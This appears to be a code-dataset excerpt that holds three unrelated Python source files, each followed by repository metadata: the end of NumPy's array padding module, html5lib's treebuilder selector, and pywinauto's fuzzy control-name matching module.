start = arr.shape[axis] - pad_amt[1]
end = arr.shape[axis]
sym_slice = tuple(slice(None) if i != axis else slice(start, end)
for (i, x) in enumerate(arr.shape))
sym_chunk2 = arr[sym_slice][rev_idx]
if pad_amt[1] == 1:
sym_chunk2 = sym_chunk2.reshape(pad_singleton)
if 'odd' in method:
edge_slice2 = tuple(slice(None) if i != axis else -1
for (i, x) in enumerate(arr.shape))
edge_chunk = arr[edge_slice2].reshape(pad_singleton)
sym_chunk2 = 2 * edge_chunk - sym_chunk2
del edge_chunk
# Concatenate `arr` with both chunks, extending along `axis`
return np.concatenate((sym_chunk1, arr, sym_chunk2), axis=axis)
def _pad_wrap(arr, pad_amt, axis=-1):
"""
Pad `axis` of `arr` via wrapping.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : tuple of ints, length 2
Padding to (prepend, append) along `axis`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt[0]` values prepended and `pad_amt[1]`
values appended along `axis`. Both regions are padded wrapped values
from the opposite end of `axis`.
Notes
-----
This method of padding is also known as 'tile' or 'tiling'.
The modes 'reflect', 'symmetric', and 'wrap' must be padded with a
single function, lest the indexing tricks in non-integer multiples of the
original shape would violate repetition in the final iteration.
"""
# Implicit booleanness to test for zero (or None) in any scalar type
if pad_amt[0] == 0 and pad_amt[1] == 0:
return arr
##########################################################################
# Prepended region
# Slice off a reverse indexed chunk from near edge to pad `arr` before
start = arr.shape[axis] - pad_amt[0]
end = arr.shape[axis]
wrap_slice = tuple(slice(None) if i != axis else slice(start, end)
for (i, x) in enumerate(arr.shape))
wrap_chunk1 = arr[wrap_slice]
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
if pad_amt[0] == 1:
wrap_chunk1 = wrap_chunk1.reshape(pad_singleton)
##########################################################################
# Appended region
# Slice off a reverse indexed chunk from far edge to pad `arr` after
wrap_slice = tuple(slice(None) if i != axis else slice(0, pad_amt[1])
for (i, x) in enumerate(arr.shape))
wrap_chunk2 = arr[wrap_slice]
if pad_amt[1] == 1:
wrap_chunk2 = wrap_chunk2.reshape(pad_singleton)
# Concatenate `arr` with both chunks, extending along `axis`
return np.concatenate((wrap_chunk1, arr, wrap_chunk2), axis=axis)
def _normalize_shape(ndarray, shape, cast_to_int=True):
"""
Private function which does some checks and normalizes the possibly
much simpler representations of 'pad_width', 'stat_length',
'constant_values', 'end_values'.
Parameters
----------
narray : ndarray
Input ndarray
shape : {sequence, array_like, float, int}, optional
The width of padding (pad_width), the number of elements on the
edge of the narray used for statistics (stat_length), the constant
value(s) to use when filling padded regions (constant_values), or the
endpoint target(s) for linear ramps (end_values).
((before_1, after_1), ... (before_N, after_N)) unique number of
elements for each axis where `N` is rank of `narray`.
((before, after),) yields same before and after constants for each
axis.
(constant,) or val is a shortcut for before = after = constant for
all axes.
cast_to_int : bool, optional
Controls if values in ``shape`` will be rounded and cast to int
before being returned.
Returns
-------
normalized_shape : tuple of tuples
val => ((val, val), (val, val), ...)
[[val1, val2], [val3, val4], ...] => ((val1, val2), (val3, val4), ...)
((val1, val2), (val3, val4), ...) => no change
[[val1, val2], ] => ((val1, val2), (val1, val2), ...)
((val1, val2), ) => ((val1, val2), (val1, val2), ...)
[[val , ], ] => ((val, val), (val, val), ...)
((val , ), ) => ((val, val), (val, val), ...)
"""
ndims = ndarray.ndim
# Shortcut shape=None
if shape is None:
return ((None, None), ) * ndims
# Convert any input `info` to a NumPy array
arr = np.asarray(shape)
# Switch based on what input looks like
if arr.ndim <= 1:
if arr.shape == () or arr.shape == (1,):
# Single scalar input
# Create new array of ones, multiply by the scalar
arr = np.ones((ndims, 2), dtype=ndarray.dtype) * arr
elif arr.shape == (2,):
# Apply padding (before, after) each axis
# Create new axis 0, repeat along it for every axis
arr = arr[np.newaxis, :].repeat(ndims, axis=0)
else:
fmt = "Unable to create correctly shaped tuple from %s"
raise ValueError(fmt % (shape,))
elif arr.ndim == 2:
if arr.shape[1] == 1 and arr.shape[0] == ndims:
# Padded before and after by the same amount
arr = arr.repeat(2, axis=1)
elif arr.shape[0] == ndims:
# Input correctly formatted, pass it on as `arr`
arr = shape
else:
fmt = "Unable to create correctly shaped tuple from %s"
raise ValueError(fmt % (shape,))
else:
fmt = "Unable to create correctly shaped tuple from %s"
raise ValueError(fmt % (shape,))
# Cast if necessary
if cast_to_int is True:
arr = np.round(arr).astype(int)
# Convert list of lists to tuple of tuples
return tuple(tuple(axis) for axis in arr.tolist())
def _validate_lengths(narray, number_elements):
"""
Private function which does some checks and reformats pad_width and
stat_length using _normalize_shape.
Parameters
----------
narray : ndarray
Input ndarray
number_elements : {sequence, int}, optional
The width of padding (pad_width) or the number of elements on the edge
of the narray used for statistics (stat_length).
((before_1, after_1), ... (before_N, after_N)) unique number of
elements for each axis.
((before, after),) yields same before and after constants for each
axis.
(constant,) or int is a shortcut for before = after = constant for all
axes.
Returns
-------
_validate_lengths : tuple of tuples
int => ((int, int), (int, int), ...)
[[int1, int2], [int3, int4], ...] => ((int1, int2), (int3, int4), ...)
((int1, int2), (int3, int4), ...) => no change
[[int1, int2], ] => ((int1, int2), (int1, int2), ...)
((int1, int2), ) => ((int1, int2), (int1, int2), ...)
[[int , ], ] => ((int, int), (int, int), ...)
((int , ), ) => ((int, int), (int, int), ...)
"""
normshp = _normalize_shape(narray, number_elements)
for i in normshp:
chk = [1 if x is None else x for x in i]
chk = [1 if x >= 0 else -1 for x in chk]
if (chk[0] < 0) or (chk[1] < 0):
fmt = "%s cannot contain negative values."
raise ValueError(fmt % (number_elements,))
return normshp
###############################################################################
# Public functions
def pad(array, pad_width, mode, **kwargs):
"""
Pads an array.
Parameters
----------
array : array_like of rank N
Input array
pad_width : {sequence, array_like, int}
Number of values padded to the edges of each axis.
((before_1, after_1), ... (before_N, after_N)) unique pad widths
for each axis.
((before, after),) yields same before and after pad for each axis.
(pad,) or int is a shortcut for before = after = pad width for all
axes.
mode : str or function
One of the following string values or a user supplied function.
'constant'
Pads with a constant value.
'edge'
Pads with the edge values of array.
'linear_ramp'
Pads with the linear ramp between end_value and the
array edge value.
'maximum'
Pads with the maximum value of all or part of the
vector along each axis.
'mean'
Pads with the mean value of all or part of the
vector along each axis.
'median'
Pads with the median value of all or part of the
vector along each axis.
'minimum'
Pads with the minimum value of all or part of the
vector along each axis.
'reflect'
Pads with the reflection of the vector mirrored on
the first and last values of the vector along each
axis.
'symmetric'
Pads with the reflection of the vector mirrored
along the edge of the array.
'wrap'
Pads with the wrap of the vector along the axis.
The first values are used to pad the end and the
end values are used to pad the beginning.
<function>
Padding function, see Notes.
stat_length : sequence or int, optional
Used in 'maximum', 'mean', 'median', and 'minimum'. Number of
values at edge of each axis used to calculate the statistic value.
((before_1, after_1), ... (before_N, after_N)) unique statistic
lengths for each axis.
((before, after),) yields same before and after statistic lengths
for each axis.
(stat_length,) or int is a shortcut for before = after = statistic
length for all axes.
Default is ``None``, to use the entire axis.
constant_values : sequence or int, optional
Used in 'constant'. The values to set the padded values for each
axis.
((before_1, after_1), ... (before_N, after_N)) unique pad constants
for each axis.
((before, after),) yields same before and after constants for each
axis.
(constant,) or int is a shortcut for before = after = constant for
all axes.
Default is 0.
end_values : sequence or int, optional
Used in 'linear_ramp'. The values used for the ending value of the
linear_ramp and that will form the edge of the padded array.
((before_1, after_1), ... (before_N, after_N)) unique end values
for each axis.
((before, after),) yields same before and after end values for each
axis.
(constant,) or int is a shortcut for before = after = end value for
all axes.
Default is 0.
reflect_type : {'even', 'odd'}, optional
Used in 'reflect', and 'symmetric'. The 'even' style is the
default with an unaltered reflection around the edge value. For
the 'odd' style, the extented part of the array is created by
subtracting the reflected values from two times the edge value.
Returns
-------
pad : ndarray
Padded array of rank equal to `array` with shape increased
according to `pad_width`.
Notes
-----
.. versionadded:: 1.7.0
For an array with rank greater than 1, some of the padding of later
axes is calculated from padding of previous axes. This is easiest to
think about with a rank 2 array where the corners of the padded array
are calculated by using padded values from the first axis.
The padding function, if used, should return a rank 1 array equal in
length to the vector argument with padded values replaced. It has the
following signature::
padding_func(vector, iaxis_pad_width, iaxis, **kwargs)
where
vector : ndarray
A rank 1 array already padded with zeros. Padded values are
vector[:pad_tuple[0]] and vector[-pad_tuple[1]:].
iaxis_pad_width : tuple
A 2-tuple of ints, iaxis_pad_width[0] represents the number of
values padded at the beginning of vector where
iaxis_pad_width[1] represents the number of values padded at
the end of vector.
iaxis : int
The axis currently being calculated.
kwargs : misc
Any keyword arguments the function requires.
Examples
--------
>>> a = [1, 2, 3, 4, 5]
>>> np.lib.pad(a, (2,3), 'constant', constant_values=(4, 6))
array([4, 4, 1, 2, 3, 4, 5, 6, 6, 6])
>>> np.lib.pad(a, (2, 3), 'edge')
array([1, 1, 1, 2, 3, 4, 5, 5, 5, 5])
>>> np.lib.pad(a, (2, 3), 'linear_ramp', end_values=(5, -4))
array([ 5, 3, 1, 2, 3, 4, 5, 2, -1, -4])
>>> np.lib.pad(a, (2,), 'maximum')
array([5, 5, 1, 2, 3, 4, 5, 5, 5])
>>> np.lib.pad(a, (2,), 'mean')
array([3, 3, 1, 2, 3, 4, 5, 3, 3])
>>> np.lib.pad(a, (2,), 'median')
array([3, 3, 1, 2, 3, 4, 5, 3, 3])
>>> a = [[1, 2], [3, 4]]
>>> np.lib.pad(a, ((3, 2), (2, 3)), 'minimum')
array([[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1],
[3, 3, 3, 4, 3, 3, 3],
[1, 1, 1, 2, 1, 1, 1],
[1, 1, 1, 2, 1, 1, 1]])
>>> a = [1, 2, 3, 4, 5]
>>> np.lib.pad(a, (2, 3), 'reflect')
array([3, 2, 1, 2, 3, 4, 5, 4, 3, 2])
>>> np.lib.pad(a, (2, 3), 'reflect', reflect_type='odd')
array([-1, 0, 1, 2, 3, 4, 5, 6, 7, 8])
>>> np.lib.pad(a, (2, 3), 'symmetric')
array([2, 1, 1, 2, 3, 4, 5, 5, 4, 3])
>>> np.lib.pad(a, (2, 3), 'symmetric', reflect_type='odd')
array([0, 1, 1, 2, 3, 4, 5, 5, 6, 7])
>>> np.lib.pad(a, (2, 3), 'wrap')
array([4, 5, 1, 2, 3, 4, 5, 1, 2, 3])
>>> def padwithtens(vector, pad_width, iaxis, kwargs):
... vector[:pad_width[0]] = 10
... vector[-pad_width[1]:] = 10
... return vector
>>> a = np.arange(6)
>>> a = a.reshape((2, 3))
>>> np.lib.pad(a, 2, padwithtens)
array([[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 0, 1, 2, 10, 10],
[10, 10, 3, 4, 5, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10]])
"""
if not np.asarray(pad_width).dtype.kind == 'i':
raise TypeError('`pad_width` must be of integral type.')
narray = np.array(array)
pad_width = _validate_lengths(narray, pad_width)
allowedkwargs = {
'constant': ['constant_values'],
'edge': [],
'linear_ramp': ['end_values'],
'maximum': ['stat_length'],
'mean': ['stat_length'],
'median': ['stat_length'],
'minimum': ['stat_length'],
'reflect': ['reflect_type'],
'symmetric': ['reflect_type'],
'wrap': [],
}
kwdefaults = {
'stat_length': None,
'constant_values': 0,
'end_values': 0,
'reflect_type': 'even',
}
if isinstance(mode, str):
# Make sure have allowed kwargs appropriate for mode
for key in kwargs:
if key not in allowedkwargs[mode]:
raise ValueError('%s keyword not in allowed keywords %s' %
(key, allowedkwargs[mode]))
# Set kwarg defaults
for kw in allowedkwargs[mode]:
kwargs.setdefault(kw, kwdefaults[kw])
# Need to only normalize particular keywords.
for i in kwargs:
if i == 'stat_length':
kwargs[i] = _validate_lengths(narray, kwargs[i])
if i in ['end_values', 'constant_values']:
kwargs[i] = _normalize_shape(narray, kwargs[i],
cast_to_int=False)
else:
# Drop back to old, slower np.apply_along_axis mode for user-supplied
# vector function
function = mode
# Create a new padded array
rank = list(range(len(narray.shape)))
total_dim_increase = [np.sum(pad_width[i]) for i in rank]
offset_slices = [slice(pad_width[i][0],
pad_width[i][0] + narray.shape[i])
for i in rank]
new_shape = np.array(narray.shape) + total_dim_increase
newmat = np.zeros(new_shape, narray.dtype)
# Insert the original array into the padded array
newmat[offset_slices] = narray
# This is the core of pad ...
for iaxis in rank:
np.apply_along_axis(function,
iaxis,
newmat,
pad_width[iaxis],
iaxis,
kwargs)
return newmat
# If we get here, use new padding method
newmat = narray.copy()
# API preserved, but completely new algorithm which pads by building the
# entire block to pad before/after `arr` with in one step, for each axis.
if mode == 'constant':
for axis, ((pad_before, pad_after), (before_val, after_val)) \
in enumerate(zip(pad_width, kwargs['constant_values'])):
newmat = _prepend_const(newmat, pad_before, before_val, axis)
newmat = _append_const(newmat, pad_after, after_val, axis)
elif mode == 'edge':
for axis, (pad_before, pad_after) in enumerate(pad_width):
newmat = _prepend_edge(newmat, pad_before, axis)
newmat = _append_edge(newmat, pad_after, axis)
elif mode == 'linear_ramp':
for axis, ((pad_before, pad_after), (before_val, after_val)) \
in enumerate(zip(pad_width, kwargs['end_values'])):
newmat = _prepend_ramp(newmat, pad_before, before_val, axis)
newmat = _append_ramp(newmat, pad_after, after_val, axis)
elif mode == 'maximum':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_max(newmat, pad_before, chunk_before, axis)
newmat = _append_max(newmat, pad_after, chunk_after, axis)
elif mode == 'mean':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_mean(newmat, pad_before, chunk_before, axis)
newmat = _append_mean(newmat, pad_after, chunk_after, axis)
elif mode == 'median':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_med(newmat, pad_before, chunk_before, axis)
newmat = _append_med(newmat, pad_after, chunk_after, axis)
elif mode == 'minimum':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_min(newmat, pad_before, chunk_before, axis)
newmat = _append_min(newmat, pad_after, chunk_after, axis)
elif mode == 'reflect':
for axis, (pad_before, pad_after) in enumerate(pad_width):
# Recursive padding along any axis where `pad_amt` is too large
# for indexing tricks. We can only safely pad the original axis
# length, to keep the period of the reflections consistent.
if ((pad_before > 0) or
(pad_after > 0)) and newmat.shape[axis] == 1:
# Extending singleton dimension for 'reflect' is legacy
# behavior; it really should raise an error.
newmat = _prepend_edge(newmat, pad_before, axis)
newmat = _append_edge(newmat, pad_after, axis)
continue
method = kwargs['reflect_type']
safe_pad = newmat.shape[axis] - 1
while ((pad_before > safe_pad) or (pad_after > safe_pad)):
pad_iter_b = min(safe_pad,
safe_pad * (pad_before // safe_pad))
pad_iter_a = min(safe_pad, safe_pad * (pad_after // safe_pad))
newmat = _pad_ref(newmat, (pad_iter_b,
pad_iter_a), method, axis)
pad_before -= pad_iter_b
pad_after -= pad_iter_a
safe_pad += pad_iter_b + pad_iter_a
newmat = _pad_ref(newmat, (pad_before, pad_after), method, axis)
elif mode == 'symmetric':
for axis, (pad_before, pad_after) in enumerate(pad_width):
# Recursive padding along any axis where `pad_amt` is too large
# for indexing tricks. We can only safely pad the original axis
# length, to keep the period of the reflections consistent.
method = kwargs['reflect_type']
safe_pad = newmat.shape[axis]
while ((pad_before > safe_pad) or
(pad_after > safe_pad)):
pad_iter_b = min(safe_pad,
safe_pad * (pad_before // safe_pad))
pad_iter_a = min(safe_pad, safe_pad * (pad_after // safe_pad))
newmat = _pad_sym(newmat, (pad_iter_b,
pad_iter_a), method, axis)
pad_before -= pad_iter_b
pad_after -= pad_iter_a
safe_pad += pad_iter_b + pad_iter_a
newmat = _pad_sym(newmat, (pad_before, pad_after), method, axis)
elif mode == 'wrap':
for axis, (pad_before, pad_after) in enumerate(pad_width):
# Recursive padding along any axis where `pad_amt` is too large
# for indexing tricks. We can only safely pad the original axis
# length, to keep the period of the reflections consistent.
safe_pad = newmat.shape[axis]
while ((pad_before > safe_pad) or
(pad_after > safe_pad)):
pad_iter_b = min(safe_pad,
safe_pad * (pad_before // safe_pad))
pad_iter_a = min(safe_pad, safe_pad * (pad_after // safe_pad))
newmat = _pad_wrap(newmat, (pad_iter_b, pad_iter_a), axis)
pad_before -= pad_iter_b
pad_after -= pad_iter_a
safe_pad += pad_iter_b + pad_iter_a
newmat = _pad_wrap(newmat, (pad_before, pad_after), axis)
return newmat
|
bsd-3-clause
|
alsotoes/vsphere-examples
|
python/.venv/lib/python2.6/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
|
1730
|
3405
|
"""A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to do
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from ..utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
a xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
|
gpl-3.0
|
prasen-ftech/pywinauto
|
pywinauto/findbestmatch.py
|
13
|
17529
|
# GUI Application automation and testing library
# Copyright (C) 2006 Mark Mc Mahon
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
"Module to find the closest match of a string in a list"
__revision__ = "$Revision$"
import re
import difflib
import fuzzydict
#import ctypes
#import ldistance
#levenshtein_distance = ctypes.cdll.levenshtein.levenshtein_distance
#levenshtein_distance = ldistance.distance
# need to use sets.Set for python 2.3 compatability
# but 2.6 raises a deprecation warning about sets module
try:
set
except NameError:
import sets
set = sets.Set
find_best_control_match_cutoff = .6
#====================================================================
class MatchError(IndexError):
"A suitable match could not be found"
def __init__(self, items = None, tofind = ''):
"Init the parent with the message"
self.tofind = tofind
self.items = items
if self.items is None:
self.items = []
IndexError.__init__(self,
"Could not find '%s' in '%s'"% (tofind, self.items))
_cache = {}
# given a list of texts return the match score for each
# and the best score and text with best score
#====================================================================
def _get_match_ratios(texts, match_against):
"Get the match ratio of how each item in texts compared to match_against"
# now time to figre out the matching
ratio_calc = difflib.SequenceMatcher()
ratio_calc.set_seq1(match_against)
ratios = {}
best_ratio = 0
best_text = ''
global cache
for text in texts:
if 0:
pass
if (text, match_against) in _cache:
ratios[text] = _cache[(text, match_against)]
elif(match_against, text) in _cache:
ratios[text] = _cache[(match_against, text)]
else:
# set up the SequenceMatcher with other text
ratio_calc.set_seq2(text)
# try using the levenshtein distance instead
#lev_dist = levenshtein_distance(unicode(match_against), unicode(text))
#ratio = 1 - lev_dist / 10.0
#ratios[text] = ratio
# calculate ratio and store it
ratios[text] = ratio_calc.ratio()
_cache[(match_against, text)] = ratios[text]
# if this is the best so far then update best stats
if ratios[text] > best_ratio:
best_ratio = ratios[text]
best_text = text
return ratios, best_ratio, best_text
#====================================================================
def find_best_match(search_text, item_texts, items, limit_ratio = .5):
"""Return the item that best matches the search_text
* **search_text** The text to search for
* **item_texts** The list of texts to search through
* **items** The list of items corresponding (1 to 1)
to the list of texts to search through.
* **limit_ratio** How well the text has to match the best match.
If the best match matches lower then this then it is not
considered a match and a MatchError is raised, (default = .5)
"""
search_text = _cut_at_tab(search_text)
text_item_map = UniqueDict()
# Clean each item, make it unique and map to
# to the item index
for text, item in zip(item_texts, items):
text_item_map[_cut_at_tab(text)] = item
ratios, best_ratio, best_text = \
_get_match_ratios(text_item_map.keys(), search_text)
if best_ratio < limit_ratio:
raise MatchError(items = text_item_map.keys(), tofind = search_text)
return text_item_map[best_text]
#====================================================================
_after_tab = re.compile(ur"\t.*", re.UNICODE)
_non_word_chars = re.compile(ur"\W", re.UNICODE)
def _cut_at_tab(text):
"Clean out non characters from the string and return it"
# remove anything after the first tab
return _after_tab.sub("", text)
def _clean_non_chars(text):
"Remove non word characters"
# should this also remove everything after the first tab?
# remove non alphanumeric characters
return _non_word_chars.sub("", text)
def IsAboveOrToLeft(ref_control, other_ctrl):
"Return true if the other_ctrl is above or to the left of ref_control"
text_r = other_ctrl.Rectangle()
ctrl_r = ref_control.Rectangle()
# skip controls where text win is to the right of ctrl
if text_r.left >= ctrl_r.right:
return False
# skip controls where text win is below ctrl
if text_r.top >= ctrl_r.bottom:
return False
# text control top left corner is below control
# top left corner - so not to the above or left :)
if text_r.top >= ctrl_r.top and text_r.left >= ctrl_r.left:
return False
return True
#====================================================================
distance_cuttoff = 999
def GetNonTextControlName(ctrl, controls):
"""return the name for this control by finding the closest
text control above and to its left"""
names = []
ctrl_index = controls.index(ctrl)
if ctrl_index != 0:
prev_ctrl = controls[ctrl_index-1]
if prev_ctrl.FriendlyClassName() == "Static" and \
prev_ctrl.IsVisible() and prev_ctrl.WindowText() and \
IsAboveOrToLeft(ctrl, prev_ctrl):
names.append(
prev_ctrl.WindowText() +
ctrl.FriendlyClassName())
# get the visible text controls so that we can get
# the closest text if the control has no text
text_ctrls = [ctrl_ for ctrl_ in controls
if ctrl_.IsVisible() and ctrl_.WindowText() and ctrl_.can_be_label]
best_name = ''
closest = distance_cuttoff
# now for each of the visible text controls
for text_ctrl in text_ctrls:
# get aliases to the control rectangles
text_r = text_ctrl.Rectangle()
ctrl_r = ctrl.Rectangle()
# skip controls where text win is to the right of ctrl
if text_r.left >= ctrl_r.right:
continue
# skip controls where text win is below ctrl
if text_r.top >= ctrl_r.bottom:
continue
# calculate the distance between the controls
# at first I just calculated the distance from the top let
# corner of one control to the top left corner of the other control
# but this was not best, so as a text control should either be above
# or to the left of the control I get the distance between
# the top left of the non text control against the
# Top-Right of the text control (text control to the left)
# Bottom-Left of the text control (text control above)
# then I get the min of these two
# We do not actually need to calculate the difference here as we
# only need a comparative number. As long as we find the closest one
# the actual distance is not all that important to us.
# this reduced the unit tests run on my by about 1 second
# (from 61 ->60 s)
# (x^2 + y^2)^.5
#distance = (
# (text_r.left - ctrl_r.left) ** 2 + # (x^2 + y^2)
# (text_r.bottom - ctrl_r.top) ** 2) \
# ** .5 # ^.5
#distance2 = (
# (text_r.right - ctrl_r.left) ** 2 + # (x^2 + y^2)
# (text_r.top - ctrl_r.top) ** 2) \
# ** .5 # ^.5
distance = abs(text_r.left - ctrl_r.left) + abs(text_r.bottom - ctrl_r.top)
distance2 = abs(text_r.right - ctrl_r.left) + abs(text_r.top - ctrl_r.top)
distance = min(distance, distance2)
# if this distance was closer then the last one
if distance < closest:
closest = distance
best_name = text_ctrl.WindowText() + ctrl.FriendlyClassName()
names.append(best_name)
return names
#====================================================================
def get_control_names(control, allcontrols):
"Returns a list of names for this control"
names = []
# if it has a reference control - then use that
#if hasattr(control, 'ref') and control.ref:
# control = control.ref
# Add the control based on it's friendly class name
names.append(control.FriendlyClassName())
# if it has some character text then add it base on that
# and based on that with friendly class name appended
cleaned = control.WindowText()
# Todo - I don't like the hardcoded classnames here!
if cleaned and control.has_title:
names.append(cleaned)
names.append(cleaned + control.FriendlyClassName())
# it didn't have visible text
else:
# so find the text of the nearest text visible control
non_text_names = GetNonTextControlName(control, allcontrols)
# and if one was found - add it
if non_text_names:
names.extend(non_text_names)
# return the names - and make sure there are no duplicates
return set(names)
#====================================================================
class UniqueDict(dict):
"A dictionary subclass that handles making it's keys unique"
def __setitem__(self, text, item):
"Set an item of the dictionary"
# this text is already in the map
# so we need to make it unique
if text in self:
# find next unique text after text1
unique_text = text
counter = 2
while unique_text in self:
unique_text = text + str(counter)
counter += 1
# now we also need to make sure the original item
# is under text0 and text1 also!
if text + '0' not in self:
dict.__setitem__(self, text+'0', self[text])
dict.__setitem__(self, text+'1', self[text])
# now that we don't need original 'text' anymore
# replace it with the uniq text
text = unique_text
# add our current item
dict.__setitem__(self, text, item)
def FindBestMatches(
self,
search_text,
clean = False,
ignore_case = False):
"""Return the best matches for search_text in the items
* **search_text** the text to look for
* **clean** whether to clean non text characters out of the strings
* **ignore_case** compare strings case insensitively
"""
# now time to figure out the matching
ratio_calc = difflib.SequenceMatcher()
if ignore_case:
search_text = search_text.lower()
ratio_calc.set_seq1(search_text)
ratios = {}
best_ratio = 0
best_texts = []
ratio_offset = 1
if clean:
ratio_offset *= .9
if ignore_case:
ratio_offset *= .9
for text_ in self:
# make a copy of the text as we need the original later
text = text_
if clean:
text = _clean_non_chars(text)
if ignore_case:
text = text.lower()
# check if this item is in the cache - if yes, then retrieve it
if (text, search_text) in _cache:
ratios[text_] = _cache[(text, search_text)]
elif(search_text, text) in _cache:
ratios[text_] = _cache[(search_text, text)]
# not in the cache - calculate it and add it to the cache
else:
# set up the SequenceMatcher with other text
ratio_calc.set_seq2(text)
# if a very quick check reveals that this is not going
# to match then
ratio = ratio_calc.real_quick_ratio() * ratio_offset
if ratio >= find_best_control_match_cutoff:
ratio = ratio_calc.quick_ratio() * ratio_offset
if ratio >= find_best_control_match_cutoff:
ratio = ratio_calc.ratio() * ratio_offset
# save the match we got and store it in the cache
ratios[text_] = ratio
_cache[(text, search_text)] = ratio
# try using the levenshtein distance instead
#lev_dist = levenshtein_distance(unicode(search_text), unicode(text))
#ratio = 1 - lev_dist / 10.0
#ratios[text_] = ratio
#print "%5s" %("%0.2f"% ratio), search_text, `text`
# if this is the best so far then update best stats
if ratios[text_] > best_ratio and \
ratios[text_] >= find_best_control_match_cutoff:
best_ratio = ratios[text_]
best_texts = [text_]
elif ratios[text_] == best_ratio:
best_texts.append(text_)
#best_ratio *= ratio_offset
return best_ratio, best_texts
#====================================================================
def build_unique_dict(controls):
"""Build the disambiguated list of controls
Separated out to a different function so that we can get
the control identifiers for printing.
"""
name_control_map = UniqueDict()
# collect all the possible names for all controls
# and build a list of them
for ctrl in controls:
ctrl_names = get_control_names(ctrl, controls)
# for each of the names
for name in ctrl_names:
name_control_map[name] = ctrl
return name_control_map
#====================================================================
def find_best_control_matches(search_text, controls):
"""Returns the control that is the the best match to search_text
This is slightly differnt from find_best_match in that it builds
up the list of text items to search through using information
from each control. So for example for there is an OK, Button
then the following are all added to the search list:
"OK", "Button", "OKButton"
But if there is a ListView (which do not have visible 'text')
then it will just add "ListView".
"""
name_control_map = build_unique_dict(controls)
# # collect all the possible names for all controls
# # and build a list of them
# for ctrl in controls:
# ctrl_names = get_control_names(ctrl, controls)
#
# # for each of the names
# for name in ctrl_names:
# name_control_map[name] = ctrl
search_text = unicode(search_text)
best_ratio, best_texts = name_control_map.FindBestMatches(search_text)
best_ratio_ci, best_texts_ci = \
name_control_map.FindBestMatches(search_text, ignore_case = True)
best_ratio_clean, best_texts_clean = \
name_control_map.FindBestMatches(search_text, clean = True)
best_ratio_clean_ci, best_texts_clean_ci = \
name_control_map.FindBestMatches(
search_text, clean = True, ignore_case = True)
if best_ratio_ci > best_ratio:
best_ratio = best_ratio_ci
best_texts = best_texts_ci
if best_ratio_clean > best_ratio:
best_ratio = best_ratio_clean
best_texts = best_texts_clean
if best_ratio_clean_ci > best_ratio:
best_ratio = best_ratio_clean_ci
best_texts = best_texts_clean_ci
if best_ratio < find_best_control_match_cutoff:
raise MatchError(items = name_control_map.keys(), tofind = search_text)
return [name_control_map[best_text] for best_text in best_texts]
#
#def GetControlMatchRatio(text, ctrl):
# # get the texts for the control
# ctrl_names = get_control_names(ctrl)
#
# #get the best match for these
# matcher = UniqueDict()
# for name in ctrl_names:
# matcher[name] = ctrl
#
# best_ratio, unused = matcher.FindBestMatches(text)
#
# return best_ratio
